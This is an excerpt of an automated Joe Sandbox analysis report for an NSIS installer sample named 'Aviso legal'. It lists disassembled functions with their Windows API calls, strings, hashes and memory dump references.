Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69

Function 705B2655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 705B12BB: GlobalAlloc.KERNEL32(00000040,?,705B12DB,?,705B137F,00000019,705B11CA,-000000A0), ref: 705B12C5

GlobalFree.KERNEL32(?), ref: 705B2743
GlobalFree.KERNEL32(00000000), ref: 705B2778

Memory Dump Source

Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true

Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 2fc03345d81cbf0d7047feaa9a738e2f258c7af56257cb391505e604b71dedca
Instruction ID: f297e9d1c26f6dcc88a5e9757394cf590103faa47dd86fbf476c66e65de0207b
Opcode Fuzzy Hash: 2fc03345d81cbf0d7047feaa9a738e2f258c7af56257cb391505e604b71dedca
Instruction Fuzzy Hash: 4531B032104189DFC726AF55CD88E2E7FBAEB963003244A2DF20187220DB7878059B75

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8

Function 00405F14 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp, 4u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstAE84.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp, 4u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp, 4u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75E03420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D

Strings

4u, xrefs: 00405F16
C:\Users\user\AppData\Local\Temp\nstAE84.tmp, xrefs: 00405F1A, 00405F1F, 00405F25, 00405F66, 00405F6C, 00405F74, 00405F7C
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4u$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nstAE84.tmp
API String ID: 3248276644-2582466233
Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE

Function 705B2480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 705B25C2

Part of subcall function 705B12CC: lstrcpynW.KERNEL32(00000000,?,705B137F,00000019,705B11CA,-000000A0), ref: 705B12DC

GlobalAlloc.KERNEL32(00000040), ref: 705B2548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 705B2563

Memory Dump Source

Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true

Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: fbd8c19563181c242351beaa6177d2a0352f3b5b16ca2eb571d7afb054e6f10b
Instruction ID: 8d5f82dfeacebbc087ad68daaa28a8d1cf76e963b1fda7e86be7d7d274546781
Opcode Fuzzy Hash: fbd8c19563181c242351beaa6177d2a0352f3b5b16ca2eb571d7afb054e6f10b
Instruction Fuzzy Hash: 0B41C0B1008389DFD764AF25D848A2E7FF9FB94310F20491EF54A8A680E778B944DB71

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000), ref: 00406779

CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 0465d2832808ea9d6fff4b9245e4cab849096788d5b9b76ed02900a81bf07427
Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
Opcode Fuzzy Hash: 0465d2832808ea9d6fff4b9245e4cab849096788d5b9b76ed02900a81bf07427
Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED

Function 705B16BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,705B22D8,?,00000808), ref: 705B16D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,705B22D8,?,00000808), ref: 705B16DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,705B22D8,?,00000808), ref: 705B16F0
GetProcAddress.KERNEL32(705B22D8,00000000), ref: 705B16F7
GlobalFree.KERNEL32(00000000), ref: 705B1700

Memory Dump Source

Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true

Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: e947b8310b2e5a055856f76cb6c0458782d1fca6078b387b8d4b364c637e29b3
Instruction ID: 472fc74ce7a5424157759d6192137e64caa3473886b3b0a890359f1fe8361922
Opcode Fuzzy Hash: e947b8310b2e5a055856f76cb6c0458782d1fca6078b387b8d4b364c637e29b3
Instruction Fuzzy Hash: 62F0FE731061387B963026A78C4CD9B7E9CDF9B2F5B210311F718911A086615C019BF1

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
wsprintfW.USER32 ref: 00404DF0
SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

%u.%u%s%s, xrefs: 00404DD1

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 06d0c97e576fd12928d3ccf504f16285b7ed678bb4ff82b9d12c133dfbf75c1e
Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
Opcode Fuzzy Hash: 06d0c97e576fd12928d3ccf504f16285b7ed678bb4ff82b9d12c133dfbf75c1e
Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8

Function 00405EB7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp, 4u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
CharNextW.USER32(00000000), ref: 00405ECA
CharNextW.USER32(00000000), ref: 00405EE2

Strings

C:\Users\user\AppData\Local\Temp\nstAE84.tmp, xrefs: 00405EB8

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nstAE84.tmp
API String ID: 3213498283-2550375725
Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
Instruction ID: b7f7aa27055ddc775a1b47344aef2f77b81fec2ea34db2f3ccdabfa21b6bce3d
Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
Instruction Fuzzy Hash: 7BF0F631810E1296DB317B548C44E7B97BCEB64354B04843BD741B71C0D3BC8D808BDA

Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD

Function 705B10E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 705B1171
GlobalAlloc.KERNEL32(00000040,?), ref: 705B11E3
GlobalFree.KERNEL32 ref: 705B124A
GlobalFree.KERNEL32(?), ref: 705B129B
GlobalFree.KERNEL32(00000000), ref: 705B12B1

Memory Dump Source

Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true

Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 85f0cf5a272f08d66dfac1dbd2810e1ad1a01379959bc4da072236e0a5ab2fd4
Instruction ID: 7e8ad353792fa1a01277a2f4406fe279212e8caeab5a82998ce0077b1761d32e
Opcode Fuzzy Hash: 85f0cf5a272f08d66dfac1dbd2810e1ad1a01379959bc4da072236e0a5ab2fd4
Instruction Fuzzy Hash: 10518076500209DFD785EF6AC94DB19BBFAEB54315BA0461AF906DB320E738BD00CB58

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075

